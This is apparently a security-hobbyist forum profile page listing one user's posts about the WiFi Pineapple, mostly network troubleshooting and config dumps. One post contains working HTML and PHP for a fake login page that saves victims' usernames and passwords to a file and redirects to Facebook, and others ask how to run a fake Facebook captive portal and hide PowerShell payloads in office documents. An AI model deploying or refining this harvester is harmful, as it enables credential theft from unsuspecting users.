Jump to content

Mother

Active Members
  • Posts

    67
  • Joined

  • Last visited

Posts posted by Mother

  1. First off I am no coder so. I want to create a custom html that ask a victim for creds then post the creds to a txt file in current directory. So far I have a simple html .

    login.html

    <form action="login.php" method="post">
    <input type="text" id="username" name="username"/>
    <input type="password" id="password" name="password"/>
    <input type="submit" name="Login" value="Login">
    </form>

    login.php

    <html>
     <head>
      <title>Login</title>
     </head>
     <body>
    
    <?php
    
    //If Submit Button Is Clicked Do the Following
    if ($_POST['Login']){
    
    $myFile = "log.txt";
    $fh = fopen($myFile, "w+") or die("can't open file");
    $stringData = $_POST['username'] . ":";
    echo fwrite($fh, $stringData);
    $stringData = $_POST['password'] . "\n";
    echo fwrite($fh, $stringData);
    fclose($fh);
    
    }
    
    ?>
    
    
    
    <script>location.href='https://facebook.com';</script>
    
    </body>
    </html>

    I am running this on Kali with Apache2. I can input the text and hit login then it redirects me to Facebook just fine. The only issue is that is does not create the log.txt in /var/www.

    I am on Kali 2016.2. I want to move this the the Nano for the captive portal. Any Ideas???

     

    Thanks

  2. What I am trying to accomplish is deploying about 15-20 usb sticks around the offices and want to test users to see if they just plug them in. The issue is I do not want to purchase 15-20 Rubber Duckies and end up loosing half of them. I was thinking of creating some malicious pdf, excel, doc, or image and seeing who actually plugs the usb in and opens the file. Does anyone have any ideas on how to perform this? I do have working powershell scripts that connect to my MSF handler successfully but not sure how to hide the code into something else.

    Thanks in advance

  3. Hello all

    So I want to see if it is possible to set up the nano with a fake facebook login page and have clients that go to FB to hit the nano's fake FB login, capture the account info then send them on to the real FB login. I have some scripts that seem to work with capturing the passwords but I am not sure of to get them on the Nano. Any tutorials out there on this?

     

    Thanks

  4. On 4/13/2016 at 6:29 AM, mattltm said:

    After a bit of testing I have found that problem with this Nano seems to be when running Recon at the same time as PineAP. If I leave PineAP running on it's own then it is quite happy and runs for hours and hours but it locks up after I run a few Recon scans.

    I also tested this on the first Nano that I had and can confirm that it's not the same problem that I had with the original.

    Good to know. I am having the same issues.

     

  5. 15 hours ago, Skinny said:

    It could be due to 100 different reasons. Could you give more detail? Are you wanting to capture unassociated or associated clients? Are you trying to Deauth a client? Do you want any client to connect or a certain client to connect? Are you posing as an AP that is using WPA2 or as an open AP? It's hard to help without a scenario.

    Are you wanting to capture unassociated or associated clients? > unassociated

    Are you trying to Deauth a client? > Yes

    Do you want any client to connect or a certain client to connect? > any client

    Are you posing as an AP that is using WPA2 or as an open AP? The AP is using WPA2

  6. Regarding your "No such file or directory" problem, it comes from the wiki. I think the problem is that the quotes in your landing page configuration are not the correct ones (" vs ")

    Try to replace your landing page configuration with the following (with correct ones):

    &lt;html&gt;
    &lt;head&gt;
    &lt;meta http-equiv="REFRESH" content="0;url=index.html"&gt;
    &lt;/head&gt;
    &lt;body&gt;
    &lt;/body&gt;
    &lt;/html&gt;
    

    Thanks I will give that a try and let you know.

  7. So I am trying to my first attempt at rick rolling but not having much luck.

    What I have done...

    I gave downloaded the package from http://www.wifipineapple.com/doku.php?id=rickrolling and followed the instructions. I move the 3 files into the www directory on the pineapple. When I connect a device to the pineapple and go to a web page I get either a blank screen or a message saying "No such file or directory"

    Any assistance?

    Thanks

  8. ifconfig -a, see if it is there and then start it ifconfig up wlan0 or whatever its ID is. Also, do a dmesg before plugging it in, then do dmesg again after, see what kind of info you get, if its erroring out or what not.

    Thanks. It is working.

  9. oddly I don't see the option to edit...So I'm going to put this in another post...

    After rebooting I'm now receiving a IP of 192.168.10.4

    I really don't understand whats going on or how to fix it...I don't think I will try doing that again after I get it back to running right though, lol

    Thats what mine has been doing now for almost a month. I have flashed and reflashed but no joy.....

  10. Here is the config from the pineapple

    Network

    # Copyright © 2006 OpenWrt.org

    config interface loopback

    option ifname lo

    option proto static

    option ipaddr 127.0.0.1

    option netmask 255.0.0.0

    config interface lan

    option ifname eth0

    option type bridge

    option proto static

    option ipaddr 172.16.42.1

    option netmask 255.255.255.0

    option gateway 172.16.42.42

    option dns 8.8.8.8

    DHCP

    config 'dnsmasq'

    option 'domainneeded' '1'

    option 'boguspriv' '1'

    option 'filterwin2k' '0'

    option 'localise_queries' '1'

    option 'rebind_protection' '1'

    option 'rebind_localhost' '1'

    option 'local' '/lan/'

    option 'domain' 'lan'

    option 'expandhosts' '1'

    option 'nonegcache' '0'

    option 'authoritative' '1'

    option 'readethers' '1'

    option 'leasefile' '/tmp/dhcp.leases'

    option 'resolvfile' '/tmp/resolv.conf.auto'

    config 'dhcp' 'lan'

    option 'interface' 'lan'

    option 'start' '100'

    option 'limit' '150'

    option 'leasetime' '12h'

    option 'ignore' '0'

    list 'dhcp_option' '3,172.16.42.42'

    list 'dhcp_option' '6,172.16.42.1,8.8.8.8'

    list 'dhcp_option' '6,172.16.42.1,208.67.222.222'

    config 'dhcp' 'wan'

    option 'interface' 'wan'

    option 'ignore' '1'

    option 'start' '100'

    option 'limit' '150'

    option 'leasetime' '12h'

    list 'dhcp_option' '3,172.16.42.42'

    list 'dhcp_option' '6,172.16.42.1,8.8.8.8'

    list 'dhcp_option' '6,172.16.42.1,208.67.222.222'

  11. OK, So I am home know and have it set up on my home network. I am experiencing the same issue.

    I am trying to grep "192.168.10.2" which is the gateway I am always getting when I connect to the "internet" ssid but havent found anything yet. Does anyone have any idea on what the hell is going on? I guess I am the only one dealing with issue.

    This the ipconfig from the Win 7 laptop when I connect to the pineapple and pull an address........

    Wireless LAN adapter Wireless Network Connection:

    Connection-specific DNS Suffix . : Networking.com

    Description . . . . . . . . . . . : Intel® WiFi Link 5100 AGN

    Physical Address. . . . . . . . . : 00-24-D6-6A-91-14

    DHCP Enabled. . . . . . . . . . . : Yes

    Autoconfiguration Enabled . . . . : Yes

    Link-local IPv6 Address . . . . . : fe80::84f0:b36c:7278:7041%11(Preferred)

    IPv4 Address. . . . . . . . . . . : 192.168.10.36(Preferred)

    Subnet Mask . . . . . . . . . . . : 255.255.255.0

    Lease Obtained. . . . . . . . . . : Saturday, December 10, 2011 4:53:03 PM

    Lease Expires . . . . . . . . . . : Saturday, December 10, 2011 4:54:15 PM

    Default Gateway . . . . . . . . . : 192.168.10.2

    DHCP Server . . . . . . . . . . . : 255.255.255.255

    DHCPv6 IAID . . . . . . . . . . . : 218113238

    DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-16-56-39-2D-00-26-B9-96-08-A7

    DNS Servers . . . . . . . . . . . : 192.168.10.2

    NetBIOS over Tcpip. . . . . . . . : Enabled

×
×
  • Create New...